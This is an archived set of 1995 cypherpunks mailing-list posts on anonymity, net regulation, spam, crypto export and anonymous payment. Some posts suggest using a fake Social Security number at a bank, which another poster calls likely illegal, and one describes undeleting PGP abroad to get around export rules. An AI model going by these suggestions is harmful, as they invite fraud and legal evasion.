business hmmmm?

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Goren <ben@Tux.Music.ASU.Edu>
Date: Tue, 3 Jan 95 14:45:02 PST
To: cypherpunks@toad.com
Subject: Re: Stegno for Kids
In-Reply-To: <Pine.ULT.3.91.950103140953.24233A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.3.89.9501031508.A2786-0100000@Tux.Music.ASU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Lemon juice makes a good invisible ink for kids. Write the message; heat 
the paper to reveal it. I used a match, but I suspect a hairdryer would 
be much more sensible.

b&




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marsha-w@uiuc.edu (Marsha-W)
Date: Tue, 3 Jan 95 13:52:15 PST
To: cypherpunks@toad.com
Subject: LAW AND ETHICS ON THE "NETS"
Message-ID: <ab2f9292150210048e24@[128.174.91.111]>
MIME-Version: 1.0
Content-Type: text/plain


Looks like more of a push for regulation:  Charles Bell
thought you all might have something to say about this...
------------------------------------------------------------------------------
              ABA SCI/TECH SECTION, IPPP COMMITTEE
                  LAW AND ETHICS ON THE "NETS"
                        December 8, 1994

     The John Marshall Law School's Center for Informatics Law, in
conjunction with the ABA Section of Science & Technology Committee
on Information Practices, Policies, and Privacy, is undertaking a
project entitled, "Law and Ethics on the 'Nets'" (LEON).

     The development of a national information infrastructure and
a global electronic network, of which Internet is the backbone, has
presented a multitude of legal and ethical problems involving use
and abuse of the networks, nationally and worldwide.  Almost on a
daily basis, news items announce electronic network transmissions
constituting hate mail, profanity, vulgarity, obscenity, child
pornography, sexual harassment, defamation and invasion of privacy.

The violation of intellectual property rights and information
system security are also frequent occurrences.  National and
international discussions consider such questions as what "rules of
the road" ought to apply, who can make them, how can they be
enforced, and what will be the legal and political relationships
between states and nations regarding cyberspace?  It is argued that
at present the lawless, the intolerant and the disrespectful seem
able to pollute the worldwide information stream with little
constraint.

     Certainly, the current state of anarchy in national and global
electronic networks cannot continue if the technology is to achieve
the remarkable benefits that have been predicted in terms of
communications among institutions and individuals, whether
government, business or society at large.  The purpose of the
CIL/S&T project is to promote a dialogue that can lead to
recommendations for treating with the many issues at hand.

     We solicit the participation of the Sci/Tech IPPP Committee
(and interested others!) in addressing the foregoing issues.
Please send me your expression of interest -- indicating what
specific aspects of the various questions you would like to
address, and then I'll organize us into some working groups.
PLEASE LET ME KNOW YOUR INTERESTS BY JANUARY 9, 1995, SO WE CAN
STRUCTURE THE PROJECT AND PROMPTLY GET UNDER WAY.

     We plan a program on the project for the ABA annual meeting in
Chicago next August, and we hope to generate a publication for the
Section concerning the project results.


George B. Trubow, Professor of Law
Director, Center for Informatics Law
The John Marshall Law School
315 S. Plymouth Ct.
Chicago, IL 60604-3907
Fax: 312-427-8307; Voice: 312-987-1445
E-mail: 7trubow@jmls.edu




Marsha Woodbury     marsha-w@uiuc.edu    U of Illinois/Urbana-Champaign
FAX 217-356-7050        Home 217-337-0001       Work 217-244-0780
http://www.cpsr.org/dox/global.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Tue, 3 Jan 95 12:55:30 PST
To: cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
Message-ID: <199501032101.QAA27544@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Forwarded message:
- From dcwill@python.ee.unr.edu Tue Jan  3 11:52:23 1995
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Message-Id: <199501031952.LAA04685@python.ee.unr.edu>
Subject: Re: Press attack on anonymity.
To: asgaard@sos.sll.se (Mats Bergstrom)
Date: Tue, 3 Jan 1995 11:52:15 -0800 (PST)
Cc: dcwill@python.ee.unr.edu (Dr. D.C. Williams, P.E.)
In-Reply-To: <Pine.HPP.3.91.950103194933.7114A-100000@cor.sos.sll.se> from "Mats Bergstrom" at Jan 3, 95 08:05:49 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 842       

Mats Bergstrom wrote:

> Since Joe User doesn't really
> care if he can connect anonymously or not, at least not yet,
> they might very well succeed in making some aspects of anonymity
> 'illegal'. But who cares, if anonymous agents can't be traced?

Because then the last, unstoppable act of the State will be to clamp
down on anonymous agents.

See "How to Boil Live Frogs". You can't dump them into boiling water
because they will jump out. Instead, start at a comfortable temperature
and turn up the heat a little bit at a time. Eventually, the frogs become
unable to escape and are lulled to their unconscious death. I equate "making 
some aspects 'illegal'" with increasing the water temperature. 

To paraphrase and oft-seen .sig from this list:

"Seldom is freedom of any kind lost all at once."


=D.C. Williams	<dcwill@ee.unr.edu>


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwm6/ioZzwIn1bdtAQGuRwGAobH2lCXDIHUCitG1mcI0RasjMOWjovT2
xUpa1Xta/mphm/s+2H21f7kuFvY6smcn
=wclb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raph@netcom.com (Raph Levien)
Date: Tue, 3 Jan 95 16:59:09 PST
To: cypherpunks@toad.com
Subject: Siegel and Lewis
Message-ID: <199501040022.QAA21291@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



   I just got off the phone with Peter Lewis, reporter for the New
York Times. He is unaware of any grand consipracy to regulate the Net,
but then again if there was one, I don't think they'd tell him.

   His piece that ran Saturday was badly mangled by the editorial
process, especially since it ran on page one. Those articles get to be
mangled by a whole new set of people who otherwise wouldn't get to
touch it. I think Lewis has basically good intentions, and does do his
homework before writing a story.

   Yecchh. Now I know why I don't rely on daily newspapers for my news
(the Internet keeps me up on the fast-breaking stuff, and the
Economist fills me in on the rest). The fact that most people rely
papers and the even worse TV news does not bode well.

   Martha Siegel is just fucked up enough that she will probably push
for legislation regulating the nets. Congress is just fucked up that
they might pass it.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Tue, 3 Jan 95 14:37:58 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: calls for regulation
In-Reply-To: <ab2f9292150210048e24@[128.174.91.111]>
Message-ID: <Pine.3.89.9501031601.A517-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain



	This is pretty scary, I mean it always sat in the back of my mind 
that they would attemt to rgulate the net, and to pass legislation and 
all, but now that it is rearing it's head and looks like there is going 
to be a push for it, I am actually concerned, to teh point of fear 
almost.  Not a paralyzing fear, but a definite feeling that action is 
neccesary now to either head it off, or provide for alternative forms of 
communication on the Net if it does come.  Thank goodness the cypherpunks 
have been working on crypto, it is at least deployed enough now that any 
attempt to control that would entail drastic measures, like REALLY 
drastic. 

	I think perhaps we should make a concerted effort to alert eh 
rest of the net of these happenings, and to tell them to contact their 
legislators and such to try and stop it, or at least attempt to stop the 
hystericism that these articles will drum up in congress.  Perhaps 
someone will be kind enough to write "newsletter" or a post to be spread 
throught usenet and other BBS's and mailing lists(under control, not 
spamming or anything) that alerts people on what is happening, and what 
they can do about it. I am afraid I am to inexperienced as a writer of 
such things, I could do it, but i am sure that others here would do much 
better jobs of it, and thus influence mroe action from the people on the 
net. 

get on your boots fellas, load your guns too.  Loks like a war is 
starting up, or is it a police action 8)

i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com> (by way of marsha-w@uiuc.edu (Marsha-W))
Date: Tue, 3 Jan 95 14:34:18 PST
To: cypherpunks@toad.com
Subject: Re: LAW AND ETHICS ON THE "NETS"
Message-ID: <ab2f9e6d1c0210045754@[128.174.91.111]>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Thanks to Marsha-W for telling us about the "Law and Ethics on
the 'Nets'" project being organized at the John Marshall Law
School.  I'm signing up.  I think ALL of us should, if you get
my drift.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Tue, 3 Jan 95 14:01:58 PST
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <Pine.SUN.3.91.950103134419.1971A-100000@crl.crl.com>
Message-ID: <9501032202.AA13835@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Sandy Sandfort says:
> Gosh, my education seems to be remiss with regard to the case/
> incidents referred to.  Could someone let us know who this person
> is and what her claim to fame is?  (It certainly isn't her logic
> or writing ability.)

Martha is a de facto disbarred attorney, who, along with her equally
slimey hubby, also a de facto disbarred attorney (both resigned from
the Florida bar for ethical violations rather than be disbarred),
began posting to every group on Usenet a scummy ad explaining that if
people would only pay them a bunch of money they would file entries
into last years green card lottery for their clients, who, of course,
could have simply sent their letters in on their own for free. The net
reacted rather violently to their spamming, because unlike most
rational individuals they contended that they were doing something
perfectly decent and honest. People stopped them in the long run by
rigging up cancelbots to administer the Usenet death penalty to them.

No one would be giving them a shred of respect, except for the fact
that a certain New York Times reporter named Peter Lewis appeared to
miss the point in certain articles he published about the incident.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Tue, 3 Jan 95 17:24:48 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501031745.JAA09281@jobe.shell.portal.com>
Message-ID: <Pine.NXT.3.91.950103170912.6430A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Hal wrote:

> >   I don't see why a debit card couldn't be anonymous, even to the point 
> > of having no name, AND no picture on it. Yes, the bank has the money, but 
> > their only obligation is to dish it out to the vendors/ATMs that you have 
> > used your card with. Why should a bank care who you are once they have 
> > your money in the account.
> 
> Again, it is unclear here whether you are proposing that you would be
> anonymous to the bank or just have a blank card.  As I wrote, banks are

  I'm aiming towards anonymous from everyone. The vendor, and the bank. 

> required to get SS#'s for depositers right now, and I wouldn't expect
> that to change any time soon.  If anything, the trend appears to be
> towards more tightening rather than less.  Duncan and/or Sandy have
> suggested giving a fake SS# when you open your secured account; maybe
> that would be legal but it sounds questionable to me.

  I guess I'm being a little too unrealistic about my wishes. In my 
ideal case the IRS and the government would have nothing to do with the 
bank. Fake SS# is a good idea, but noone seems to know exactly how legal 
this is. They could, for example, claim that you were trying to defraud 
the bank and/or the IRS.

> I used my VISA yesterday, and after swiping it through the now-ubiquitous
> card readers the vendor was required by the machine to manually enter the
> last four digits on the card.  He complained that this was something new
> and was happening very frequently now (maybe a change with 1995?).  I

  I hadn't heard of this. Its been a couple of years since I've had a 
VISA card.

> have heard of fraud where people make fake VISA cards (or steal them) and
> re-program the mag stripe to have a different number than what is on the
> front.  Maybe this is a countermeasure for that.  It doesn't sound like a
> blank card is the direction the industry is going.  Does anyone have more
> info on this change?

  That's why I suggested the blank card(no embossing). Without that it 
makes it more diffcult to get your card number. I envision a transaction 
like so:

  1. Card is swiped and the database is checked for your card # and 
enough balance for the purchase.
  
  2. If authorized, a receipt is printed without card #.

  To get your card # the criminal has to either intercept the transaction 
with the database(not too hard), or comprimise the database itself.

  As long as you keep your card physicly secure you should be reasonably 
secure.

      Brian

P.S. I apologize for any misspellings or missing chars. My 
ISP(seanet.com) misses incoming characters when more than 3 sz sessions 
are running.

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 3 Jan 95 18:31:51 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
In-Reply-To: <199501032006.AA04977@poboy.b17c.ingr.com>
Message-ID: <950103.173130.6M1.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, perobich@ingr.com writes:

> Despite the odiousness of the source, might it be a Good Thing to get
> a law giving ISPs common-carrier status passed? 
> 
> When you're a common carrier, no one hassles you about the content you
> pass-- this would make it much easier for anon remailers to flourish.

I can't speak for ISPs in general, but when I still ran a public-access
system, the absolute last thing I wanted was to be thought of as a
common carrier.  While common carriers are held blameless for the
content of traffic they pass, they are also heavily regulated.  In
general, a common carrier may not refuse to provide services unless
special circumstances exist.  Want to bet Usenet abuse won't be one of
those circumstances?  Spammers would love such a state of affairs.  (and
remember who wrote that whine)

I'm for keeping regulation out of the Inet whenever and wherever
possible.
- -- 
       Roy M. Silvernail         [ ]  roy@cybrspc.mn.org
                    PGP public key available by mail
     echo /get /pub/pubkey.asc | mail file-request@cybrspc.mn.org
         These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwnfPxvikii9febJAQF/QwQAuwj1FBH/Dcx0eG6gES6DB0cxYroSHkCe
L1QP67dyjtyQ+DGIV/+JLUJuAuszmNenzv2dqUL//Nmp5dpLqVSTm2n4D6cGrs3/
YlU0J1TixBnoPMkOKFs18czBQRw/ezSH9tnCKQ0PFf+f1Se/tvS3htOxohkKPpGe
7g85dDm4wow=
=slH/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Tue, 3 Jan 95 17:49:51 PST
To: jamesd@netcom.com
Subject: Re:  Press attack on anonymity.
Message-ID: <199501040143.RAA22066@art.net>
MIME-Version: 1.0
Content-Type: text/plain


Or prehaps it is someone at HotWired... :)

-lile




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Arachelian <aarach01@barney.poly.edu>
Date: Tue, 3 Jan 95 15:01:47 PST
To: sal@panix.com
Subject: rarachel - no email
Message-ID: <Pine.3.89.9501031742.A939-0100000@barney>
MIME-Version: 1.0
Content-Type: text/plain


Hey guys,

It's me.  Don't let the new account name, and the horrible name of this 
despicable machine throw you off.  It's me, Ray Arachelian.  Some rat(s?) 
hacked into photon, the machine where my home account lives, and now, 
while I can read my prism email by going through major acrobatic 
maneouvers, I have to use this slimy shitty student account.

So for the time being, please direct any mail to this account 
aarach01@barney.poly.edu (God I hate this machine's name!)  I'll still be 
able to read anything you send to prism for the time being (durring 
winter recess they said.)

See, I have to log in to barney, ftp my mailbox over from prism, telnet 
to barney and delete my mailbox, and then read it with pine... :-(

[Eileen, could you at least build a home directory for my old account 
with a .forward to Barney for now?  Or just let me use prism without 
having to have photon connected to it?]


Thanks,
-- Ray (Arsen) Arachelian.
 [also known as rarachel@prism/photon.poly.edu, RayDude@aol.com, etc.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Arachelian <aarach01@barney.poly.edu>
Date: Tue, 3 Jan 95 15:06:31 PST
To: "David K. Merriman" <merriman@metronet.com>
Subject: Re: Comdex Disks?
In-Reply-To: <199412272331.AA09920@metronet.com>
Message-ID: <Pine.3.89.9501031828.A939-0100000@barney>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 27 Dec 1994, David K. Merriman wrote:

> Back some time ago, there was some discussion of giving away disks at Comdex
> in NY; by any chance, does anyone have a copy of the contents of what was on
> those disks?  I'd like to be able to give away 'basic info' in
> easy-to-handle format :-)

That was my puppy.  My friend Sal@panix and I gave the disks away at 
PC-EXPO and at various other events.   I have the lastest disk version of 
it if you want it, but you'll need to update PGP on the disk and maybe 
include/add/remove some articles from the articles package.

You can call me at 212-618-8818 (work) or email me here, but with the 
situation with my account, call me instead.  (And that goes for anyone 
else on the list willing to send diskettes out.  Please don't call me 
if you aren't going to give out disks and are just interested in a copy.  
You can ftp the old copies from somewhere in Canada...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Tue, 3 Jan 95 18:48:58 PST
To: Sandy Sandfort <cypherpunks@toad.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <Chameleon.4.01.950103184124.jcorgan@>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>No reason to risk a hassle by exporting PGP from the US on your 
>laptop, it's everywhere.  Just take your Secret Keyring file and 
>download PGP from a foreign FTP site once you are out of the US.

Or you can do what someone mentioned to me he does when he travels
abroad: He keeps PGP and his keyrings on a floppy, but then _deletes_
PGP.EXE.  Of course, being a good PC user, he _always_ carries a copy 
of Norton Undelete with him :)

Quite creative, IMHO, and technically legal.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov
WWW: (for now)      ftp://ftp.netcom.com/pub/jc/jcorgan/www/homepage.htm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwoKl01Diok8GKihAQH00gP/VLWJaDaS7DNp+bv1BLszEQpOlNFyS22Y
BL+Wv8Rs5efF2SG5t3E+6aHwSvaRigtjE1wwF3f46QY23ZnO1x+DTuEXy9gBRu+s
usNniiyfcozfT90wPU79b/qhRrnM/Uzwxn8XddWNz0ONEk/QZqXLLx/4PdczwDaN
L5XclEMG8n4=
=Kzyl
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Tue, 3 Jan 95 19:06:00 PST
To: Brian Lane <blane@seanet.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.NXT.3.91.950103170912.6430A-100000@kisa>
Message-ID: <Pine.SUN.3.91.950103190506.3503B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know about the rest of these suggestions, but I am reasonably 
sure that using a fake social security number is a violation of federal 
law -- no matter what the user's motivation may have been.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:08:20 PST
To: cypherpunks@toad.com
Subject: Re: Phil's Plight
Message-ID: <9501031808.AA21529@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> I think Phil deserves better than the
> silence his plight has received as of late.

True.

But would it be good or bad help if something other
than silence came from outside the USA?

I mean if the rest of the world says they love
him, the attorney will say "yes, of course. Therefore
he gets sued." :-(

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:10:03 PST
To: cypherpunks@toad.com
Subject: Re: Why I have a 512 bit PGP key
Message-ID: <9501031809.AA21532@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> A compiler can recognize one specific piece of code or a few 
> specific peices of code and do something perverse.  It cannot 
> recognize functionally equivalent code, this
> being a high order artificial intelligence problem.

It's enough to recognize DES tables or PGP procedures.

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:20:27 PST
To: cypherpunks@toad.com
Subject: Re: Why I have a 512 bit PGP key
Message-ID: <9501031819.AA21541@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> While it's likely that a sysadmin could hack the kernel to substitute
> bogus MD5 hashes, doing so in certain environments could earn the sysadmin a
> quick exit from employment.  

If it wasn't the reason he was employed for. 

In Germany it is not allowed to spy out someone elses phone calls. (Is it 
in the USA?)  But some cases got public where employees of several companys
got their phones tapped. It was done to find out whether they do private
phone calls or what they say in private phone calls.

Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Tue, 3 Jan 95 19:36:39 PST
To: cypherpunks@toad.com
Subject: RE: Edupage 1/3/95
Message-ID: <Chameleon.4.01.950103193739.jcorgan@>
MIME-Version: 1.0
Content-Type: text/plain


Some selected articles from Educom that may interest you...

***************************************************************************
Edupage, a summary of news items on information technology, is provided
three times each week as a service by Educom -- a Washington, D.C.-based
consortium of leading colleges and universities seeking to transform
education through the use of information technology. 
***************************************************************************

CYBERPHOBICS GALORE
A recent Gallup poll conducted for MCI shows almost half of the 600 white
collar respondents admitting they are cyberphobic or resistant to new
technology. More than a third do not use a computer at all, either at home
or at work, and nearly 60% don't use voice mail. Two thirds do not use
e-mail at work, and about the same number don't carry a pager. The most
common reason cited for anti-technology attitudes was a fear of loss of
privacy. Close runners up were worries over information overload and a fear
of losing face-to-face contact with associates. (Miami Herald 1/2/95 p.22) 

MORE INTERNET FACTS
Traffic on the NSFnet grew a whopping 110% in 1994, and the number of
countries online increased from approximately 137 in 1993 to approximately
159 this past year. There were 1,964 phone calls to InterNIC Registration
Services during November '94. For more facts, check out
http://www.openmarket.com/info/internet-index/current-sources.html. (The
Internet Index, Number 5)

"GIVE US YOUR MONEY, BUT KEEP YOUR OPINIONS TO YOURSELF!"
A survey of small business executives conducted for IBM by Roper Starch
Worldwide shows 65% of the respondents saying that building the information
highway is a good use of government funds, but only 3% think the government
should have "a lot" of influence on how the highway operates. Forty-four
percent felt the government should have no influence, and 49% said they
thought it should have "some" say in how things were run. (Inc. Technology
Premiere Issue p.19)

THE WIRED REVOLUTION
While saluting Wired magazine's worthy premise as a publication that
addresses the social and cultural effects of digital technologies, the
director of the 21st Century Project at the University of Texas blasts
Wired for its "fevered, adolescent consumerism, its proud display of empty
thoughts from a parade of smoke-shoveling celebrity pundits, its smug
disengagement from the thorny problems facing postindustrial societies, and
most annoyingly, its over-the-top narcissism. If this is the revolution, do
we really want to be part of it?" (New Republic 1/9-16/95 p.19)

************************************************************************
EDUPAGE is what you've just finished reading. To subscribe to Edupage: send
a message to: listproc@educom.edu and in the BODY of the message type:
subscribe edupage Sidney Carlton (assuming that your name is Sidney
Carlton; if it isn't, substitute your own name) ... To cancel subscription
to Edupage: send a message to: listproc@educom.edu and in the BODY of the
message type: unsubscribe edupage.    
************************************************************************
Educom    --     Transforming Education Through Information Technology
************************************************************************
Written by John Gehl & Suzanne Douglas. V: 404-371-1853. F: 404-371-8057

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:34:08 PST
To: cypherpunks@toad.com
Subject: Re: Stegno for Kids
Message-ID: <9501031834.AA21554@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> and Crayola brand
> secret writing pens (WOW!!!!). There are about 8 pens in the set. You write
> secretly with two of them and develop the image with the other six.

I had something like that as a toy about 20 years ago. A single pen with
tips on both sides. One to write, the other to develop. Didn't they have it
in America also?

Hadmut



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 3 Jan 95 10:38:49 PST
To: cypherpunks@toad.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <9501031838.AA21557@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



What do I have to do if I want to bring cryptographic 
equipment _into_ the USA temporary (for use or demo) and
want to take it back home after some days or weeks. 

Since I am in America then I am under american law. 
The _export_ of my own crypto stuff is not temporary. 

Does the american law allow me (a foreigner!) to take
out any cryptographic material, even if it is my own thing?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 03:08:58 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
Message-ID: <gate.T1oDyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Sandy posted Martha "Spam" Siegel's SF Chronicle editorial. If it boiled 
anyone's blood quite enough to write a letter to the paper on both the author's
background as well as the unconstitutionality of her 'solutions', I'd be happy
to sign my name in support.

BTW while paranoia is good for C'punks, I don't see a hidden plot in the
recent media coverage of anonymity. The media likes 'hot' issues, and have
flogged the other one - kiddie porn - to death. Everyone from Newsweek to 
The Economist mentioned pedophilia, simply because it grabs attention more
than global K-12 projects conducted over the net, just as anonymity grabs 
more attention in relation to crime than to sexual abuse recovery groups.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 03:08:51 PST
To: cypherpunks@toad.com
Subject: Compliance and lax Customs
Message-ID: <gate.XkPDyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



In India telco (and several other) laws are ridiculously outdated (see my
"FREEdom on the Net in India" Electrosphere, WIRED 3.01), although our
Customs are pretty techno-savvy, as they need to know prices off the cuff
for all the goodies people try to smuggle in without duty. But we're quite
adept here at ignoring many of the more inconvenient laws - I just bought
myself a new 540 mb hard disk for the equivalent of $350, and none of the
BBSes pay the required $50,000/year license fee.

It's nice to know that the US Customs are catching up with the technical
incompetence one sees in the LEAs here. But I guess American Cypherpunks are
to compliant to attempt to take advantage of such things. In fact, there's
been a noticeable slump in the mirroring of crypto from US-only ftp sites to
Europe. Obviously Cypherpunks are far more law-abiding in _practice_ than
the media would have us believe, based on what they _discuss_ ;-)

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 3 Jan 95 11:05:37 PST
To: cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
In-Reply-To: <Pine.3.89.9501030943.A4287-0100000@netcom10>
Message-ID: <Pine.HPP.3.91.950103194933.7114A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:

> higher authority of which I spoke earlier -- who is
> anonymously attacking anonymity.

> the government speaking  -- a government department with guns is
> running up a trial balloon.

Expected and hardly anything to go into public dispute about.
Cypherpunks are here to circumvent the measures of various
governments by technical means. Since Joe User doesn't really
care if he can connect anonymously or not, at least not yet,
they might very well succeed in making some aspects of anonymity
'illegal'. But who cares, if anonymous agents can't be traced?

Mats 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 03:09:04 PST
To: cypherpunks@toad.com
Subject: Law and ethics on the Net
Message-ID: <gate.kHRDyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain




>              ABA SCI/TECH SECTION, IPPP COMMITTEE
>                   LAW AND ETHICS ON THE "NETS"
>                         December 8, 1994

I've been on the Cypherpunk's mailing list for about half its lifetime,
am a technology consultant based in New Delhi, do a weekly column on
information society which has covered many of the issues you seem interested
in, and write for WIRED magazine. I am interested in law and ethics in
cyberspace, and would like to participate in your project, as long as it
is not primarily intended to culminate in a set of guidelines for legislation,
which I believe to be pointless. I'm including here some comments to your 
original announcement, which I only saw today. 

>      The development of a national information infrastructure and
> a global electronic network, of which Internet is the backbone, has
> presented a multitude of legal and ethical problems involving use
> and abuse of the networks, nationally and worldwide.  Almost on a
> daily basis, news items announce electronic network transmissions
> constituting hate mail, profanity, vulgarity, obscenity, child
> pornography, sexual harassment, defamation and invasion of privacy.

Unfortunately, due to the way media works, we don't read of the benefits of
total anonymity to participants in sexual abuse groups, human rights activists
and many others. Going by what we read in the media, 93.5% of people on the 
Net are habitual child abusers, and 62% are nuclear-equipped narco-terrorists.

> The violation of intellectual property rights and information
> system security are also frequent occurrences.  National and
> international discussions consider such questions as what "rules of
> the road" ought to apply, who can make them, how can they be
> enforced, and what will be the legal and political relationships
> between states and nations regarding cyberspace?  It is argued that
> at present the lawless, the intolerant and the disrespectful seem
> able to pollute the worldwide information stream with little
> constraint.

Or free it from the monopoly of large media organizations. Ninety-five percent
of the world's news is distributed by four agencies, who effectively shape our
view of the world at large, and decide for us the crises du jour. The Net,
_precisely_ because of its unregulated, bottom-up structure, allowed activists
to communicate during the revolution in Chiapas, Mexico; got international 
agencies to offer support for the massive earthquake in Latur India at once,
rather than wait for a Time magazine photo feature (which - surprise! - was
on Somalia just days before the world suddenly took notice of _that_ problem).

The commitment to freedom of expression, in _any form whatsoever_ including
